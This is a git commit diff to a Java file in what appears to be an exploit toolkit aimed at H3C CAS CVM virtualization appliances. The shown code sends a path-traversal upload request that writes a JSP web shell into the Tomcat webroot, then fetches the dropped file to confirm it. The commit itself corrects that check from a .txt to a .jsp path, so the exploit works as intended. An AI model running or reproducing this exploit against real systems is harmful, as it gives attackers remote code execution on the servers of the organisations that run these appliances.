Merge pull request #14 from dbgee/patch-1

White-hua · web-flow · commit ee7412ab87ca · 2023-03-25T10:11:10.000+08:00
Update cas_cvm_upload.java 文件名校验
diff --git a/src/main/java/exp/equipment/h3c/cas_cvm_upload.java b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
@@ -56,7 +56,7 @@ private boolean shell(String url,TextArea textArea){
 
         Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.jsp&name=222", payload, head, "utf-8");
 
-        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
         if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
             Platform.runLater(() -> {
                 textArea.appendText(
